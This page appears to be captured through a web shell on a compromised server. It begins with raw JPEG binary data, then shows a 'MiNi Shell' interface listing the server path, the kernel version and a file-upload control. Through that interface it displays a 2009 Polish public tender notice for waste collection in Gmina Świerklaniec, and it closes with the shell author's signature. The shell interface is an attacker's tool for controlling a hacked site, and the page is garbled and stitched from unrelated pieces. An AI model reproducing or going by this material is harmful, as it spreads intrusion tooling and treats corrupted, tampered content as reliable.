JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091021/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091021/184455-N-2009.html

<p class="kh_header"><b>Świerklaniec: Wywóz odpadów komunalnych i wielkogabarytowych wraz z dzierżawą pojemników z terenu Gminy Świerklaniec.</b><br>
<b>Numer ogłoszenia: 184455 - 2009; data zamieszczenia: 21.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Rekreacji , ul. Parkowa 30, 42-622 Świerklaniec, woj. śląskie, tel. 032 2844330, faks 032 2844490.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.palackawalera.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Budżetowa Gminy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wywóz odpadów komunalnych i wielkogabarytowych wraz z dzierżawą pojemników z terenu Gminy Świerklaniec..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1.Przedmiotem zamówienia jest wykonanie usługi w zakresie wywozu nieczystości stałych  i wielkogabarytowych wraz z dzierżawą pojemników z terenu Gminy Świerklaniec.
3.2.	Szczegółowy opis przedmiotu zamówienia przedstawiono w załączniku nr 1 do SIWZ.
3.3.	Zamawiający nie wyraża zgody na udział podwykonawców w realizacji zamówienia.
3.4.	Zamawiający nie przewiduje zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 6 ustawy Prawo zamówień publicznych. 

Przedmiotem zamówienia jest wywóz nieczystości stałych w skali miesiąca wraz z dzierżawą  kontenerów  KP-7 o pojemności 7m3 , kontenerów UKL5  o pojemności 5m3 oraz pojemników pojemności 1100 litrów, pojemników SM 240 - o pojemności 240litrów, pojemników SM 120 - o pojemności 120 litrów, pojemniki na szkło i plastiki usytuowanych  w następujących sołectwach :
Przewidywane ilości wywozów kontenerów i pojemników w skali miesiąca.



1. ŚWIERKLANIEC - HOTEL PAŁAC KAWALERA

Lp	Lokalizacja	Rodzaj pojemników	Ilość pojemników	Częstotliwość
                                                                                    Opróżniania
01.	Pałac Kawalera	Kp 7 	                  1	               5  w ciągu miesiąca
02.	Ogrodnictwo	Kp 7	                  2	               5  w ciągu miesiąca


2.SOŁECTWA ORZECH, ŚWIERKLANIEC, NAKŁO ŚLĄSKIE, NOWE CHECHŁO - NIECZYSTOŚCI STAŁE

I BUDYNKI KOMUNALNE

Lp	Lokalizacja	Rodzaj pojemników	Ilość pojemników	Częstotliwość
                                                                                    Opróżniania

I     ŚWIERKLANIEC
1.	Ul. Parkowa 34	       Kubeł SM 120	10	2 w ciągu miesiąca
2.	Ul. Oświęcimska 21	Kubeł SM 120	8	2 w ciągu miesiąca
3.	Ul. Plebiscytowa 6	SM 240-	        4      2  w ciągu miesiąca
4.	Ul. Plebiscytowa 7	SM 240-	        2      2 w ciągu miesiąca
5.	Ul. Plebiscytowa 8	Kubeł SM 120	5	2 w ciągu miesiąca
6.	Ul. Górna 33	        Kubeł SM 120-	2	2 w ciągu miesiąca
7.	Ul. Oświęcimska 7	        Kubeł SM 120	1	2 w ciągu miesiąca
II   NOWE CHECHŁO
1.	Ul. Powstańców 10	Kubeł SM 120	5	2 w ciągu miesiąca
2.	Ul. Leśna 3	                Kubeł SM 120	1	2 w ciągu miesiąca
II   ORZECH
1.	Ul. Brzechwy 8a	Kubeł SM 120	2	2 w ciągu miesiąca
2.	Ul. SZKOLNA 17A	Kubeł SM 120	6	2 w ciągu miesiąca
3.	Ul. Wieczorków 41Kubeł SM 120	1	2 w ciągu miesiąca
4.	Ul. Wieczorków (boisko sportowe)	Kubeł SM 1100	1	2 w ciągu miesiąca
IV  NAKŁO ŚĄSKIE
1.	Ul. Gówna 20	Kubeł SM 120	1	2 w ciągu miesiąca
2.	Ul. Gówna 52	Kubeł SM 1100	1	2 w ciągu miesiąca
3.	Ul. Gówna 54	Kubeł SM 1100	1	2 w ciągu miesiąca
4.	Ul. Gówna 62	Kubeł SM 120	4	2 w ciągu miesiąca
5.	Ul. Gówna 85a	Kubeł SM 120	4	2 w ciągu miesiąca
6.	Ul. Gówna 5 	Kubeł SM 1100	1	2 w ciągu miesiąca
7.	Ul. Gówna 7	        Kubeł SM 1100	1	2 w ciągu miesiąca
8.	Ul. Sportowców 1	Kubeł SM 120	1	2 w ciągu miesiąca
9.	Ul. Dworcowa 59	Kubeł SM 120	5	2 w ciągu miesiąca
10.	Ul. Wapienna 3	Kubeł SM 120	4	2 w ciągu miesiąca
11.	Ul. Wapienna 5	Kubeł SM 120	1	2 w ciągu miesiąca
12.	Cmentarz komunalny
Ul. Cmentarna	kontener KP7 2	3 w ciągu miesiąca
13.	Ul. Sportowców 1	SM 240	1	(od wiosny do jesieni) 2 w ciągu miesiąca

3.SOŁECTWA ORZECH, ŚWIERKLANIEC, NAKŁO ŚLĄSKIE, NOWE CHECHŁO


Lp	Lokalizacja	Rodzaj pojemników	Ilość pojemników	Częstotliwość
                                                                                Opróżniania

I     ORZECH

1.	Ul. Wieczorków (obok OSP)	Szkło+plastik	1	2 w ciągu miesiąca
2.	Ul. Szkolna Nakielska	         Szkło+plastik	2	2 w ciągu miesiąca
3.	Ul. Boczna	                        Szkło+plastik	1	2 w ciągu miesiąca
4.	Ul. Wieczorków Bytomskiej	Szkło+plastik	2	2 w ciągu miesiąca
II   ŚWIERKLANIEC

1.	Ul. Oświęcimska (boisko)	Szkło+plastik	2	2 w ciągu miesiąca
2.	Ul. K. Miarki (sklep)	        Szkło+plastik	2	2 w ciągu miesiąca
3.	Ul. Kościelna (sklep)	        Szkło+plastik	2	2 w ciągu miesiąca
4.	Ul. Plebiscytowa 	                Szkło+plastik	1	2 w ciągu miesiąca
5.	Ul. Romantyczna (obok lasu)	Szkło+plastik	2	2 w ciągu miesiąca
6.	Ul. Stawowa (na b. Stawie)	Szkło+plastik	2	2 w ciągu miesiąca
7.	Ul. Radzionkowska 	        Szkło+plastik	1	2 w ciągu miesiąca
III  NAKŁO ŚLĄSKIE

1.	Ul. Główna (sala gimn.)	        Szkło+plastik	2	2 w ciągu miesiąca
2.	Ul. Główna (GOK)	                Szkło+plastik	2	2 w ciągu miesiąca
3.	Ul. Chopina (skwer)	        Szkło+plastik	1	2 w ciągu miesiąca
4.	Ul. Dworcowa Tysiąclecie 	Szkło+plastik	2	2 w ciągu miesiąca
5.	Ul. Dzierżonia (obok boiska)	Szkło+plastik	2	2 w ciągu miesiąca
6.	Ul. Główna 7 (Komis)	                plastik	1	2 w ciągu miesiąca
IV  NOWE CHECHŁO

1.	Ul. Lasowicka 	               Szkło+plastik	1	2 w ciągu miesiąca
2.	Ul. Leśna (boisko sport.)	Szkło+plastik	2	2 w ciągu miesiąca

4.ZALEW NAKŁO_- CHECHŁO (obowiązuje od 01.06.2010- 31.08.2010)
Lp	Lokalizacja	Rodzaj pojemników	Ilość pojemników	Częstotliwość
                                                                                Opróżniania

01.	Pole namiotowe	Kubeł SM 1100	4 szt.	8 w ciągu miesiąca
02.	Pole namiotowe	Kp 7 	1 szt.	8 w ciągu miesiąca
03.	WOPR	Kubeł         SM 1100	1 szt.	8 w ciągu miesiąca
04.	Live	Kubeł         SM 1100	1 szt.	8 w ciągu miesiąca
05.	Marco Polo - Jaźwiński	Kubeł SM 1100	2 szt.	8 w ciągu miesiąca
06.	Gofry przed wys.napięciem - Nawrot 	Kubeł SM 1100	1 szt.	8 w ciągu miesiąca
07.	Malaga 	        Kubeł SM 1100	1 szt. 	8 w ciągu miesiąca
08.	TAMA - (BOSMAN)	Kubeł SM 1100	1 szt.	8 w ciągu miesiąca
09.	Skibniewski	        UKL 5 	1 szt.	8 w ciągu miesiąca
10.	TADEUSZ	Kubeł SM 1100	1 szt.	8 w ciągu miesiąca
11.	ZBÓJ- Hattwich	Kubeł SM 1100	2 szt.	8 w ciągu miesiąca
12.	Pole namiotowe II	Kubeł SM 1100	2 szt.	8 w ciągu miesiąca
13.	Parking betonowy	UKL 5	1 szt.	8 w ciągu miesiąca
14.	Parking - Miasteczko	Kubeł SM 1100	1szt.	8 w ciągu miesiąca
15.	Koło Bobrka	Kubeł SM 1100	1 szt.	8 w ciągu miesiąca
16.	Manager Pol	Kubeł SM 1100	2 szt.	8 w ciągu miesiąca
17.	Miasteczko Górka - początek górki od strony lasu	Kp 7 	1 szt.	8 w ciągu miesiąca
18.	Cypel	                Kp 7 	1 szt.	8 w ciągu miesiąca
19.	Koral plaża  	UKL 5	1 szt.	8 w ciągu miesiąca
20.	Elektrociepłownia 	UKL 5 	1 szt.	8 w ciągu miesiąca
21.	Wojskowe Zakłady mechaniczne - za Rybaczówką	Kubeł SM 1100	2 szt.	8 w ciągu miesiąca

Uwaga: Ilość kontenerów i pojemników w czasie trwania umowy może ulec zmianie.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.11.13.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki:
6.1. Nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 i ust. 2 pkt 1 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (Dz. U.                       2006 r. Nr 164, poz. 1163 z późn. zm.). Spełnienie ww. warunku oceniane będzie na podstawie dokumentów wchodzących w skład oferty.
6.2. Spełniają i przyjmują warunki określone w niniejszej SIWZ oraz załączonym wzorze umowy.
6.3. Posiadają koncesję, zezwolenie lub licencję, jeżeli ustawy nakładają obowiązek posiadania koncesji, zezwolenia lub licencji na podjęcie działalności gospodarczej w zakresie objętym przedmiotem zamówienia. Spełnianie ww. warunku oceniane będzie na podstawie przedłożonych w ofercie właściwych dokumentów.
6.4. Zrealizowali w ostatnich trzech latach a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną usługę wywozu nieczystości stałych, której wartość  wynosi co najmniej 150 tyś. zł. brutto. 
Spełnienie ww. warunku Zamawiający oceniał będzie na podstawie załączonego do oferty wykazu, określonego w pkt 7.1.6 SIWZ, sporządzonego wg wzoru stanowiącego załącznik nr 5 do SIWZ.
6.5. Posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 7.1. Dla udokumentowania spełnienia wymaganych warunków oferta musi zawierać następujące dokumenty:
	7.1.1. Wypełniony i podpisany formularz ofertowy - załącznik nr 3 do SIWZ.
	7.1.2. Wypełniony i podpisany formularz cenowy - załącznik nr 2 do SIWZ.
	7.1.3. Wypełnione i podpisane oświadczenie o spełnianiu przez oferenta warunków udziału w postępowaniu - załącznik nr 4 do SIWZ.
	7.1.4. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż sześć miesięcy przed upływem terminu składania ofert.
	7.1.5. Wskazanie pełnomocnika podmiotów występujących wspólnie (jeśli dotyczy wykonawcy).
		7.1.6. Wykaz usług wykonanych w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, usług, odpowiadających swoim rodzajem usługom będącym przedmiotem niniejszego zamówienia, opracowany według wzoru stanowiącego załącznik nr 5 do SIWZ. Wykonawca musi wykazać, że wykonał, co najmniej jedną usługę wywozu nieczystości stałych, której wartość  wynosi co najmniej 150 tyś. zł. brutto. 
	7.1.7. Koncesję, zezwolenie lub licencję, jeżeli ustawy nakładają obowiązek posiadania koncesji, zezwolenia lub licencji na podjęcie działalności gospodarczej w zakresie objętym przedmiotem zamówienia
	7.1.8. Aktualne zezwolenie na zbieranie i transport odpadów w ramach ustawy o odpadach z dn. 27.04.2001 r.
	7.1.9	Decyzja na odbiór odpadów komunalnych od właścicieli nieruchomości w ramach ustawy o utrzymaniu porządku i czystości w gminach lub aktualna umowa na składowanie odpadów z dn. 13.09.1996 r.
	7.1.10. Polisa lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.
7.2. Dokumenty wymienione w pozycjach: 7.1.4 - 7.1.10 można składać również w formie kserokopii potwierdzonych przez Wykonawcę za zgodność z oryginałem (np. zapis: za zgodność z oryginałem opatrzony podpisem osoby uprawnionej do reprezentowania Wykonawcy).
7.3. W przypadku dokumentów wymienionych w poz. 7.1.3, 7.1.4, 7.1.6 - 7.1.10Zamawiający wezwie Wykonawców, którzy nie złożyli w ofercie ww. dokumentów lub złożyli dokumenty zawierające błędy, do ich uzupełnienia w wyznaczonym terminie, chyba że mimo ich uzupełnienia oferta Wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania. Złożone na wezwanie Zamawiającego dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu nie później niż w dniu, w którym upłynął termin składania ofert.
7.4. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonych ofert.
7.5. Zamawiający poprawi w tekście oferty oczywiste omyłki pisarskie oraz omyłki rachunkowe w obliczeniu ceny, niezwłocznie zawiadamiając o tym wszystkich Wykonawców, którzy złożyli oferty. Omyłki rachunkowe w obliczeniu ceny zostaną poprawione wg zasad określonych w art. 88 ustawy Prawo zamówień publicznych..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.palackawalera.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Rekreacji 
ul. Parkowa 30
42-622 Świerklaniec.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.11.2009 godzina 09:00, miejsce: Gminny Ośrodek Rekreacji 
ul. Parkowa 30
42-622 Świerklaniec.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com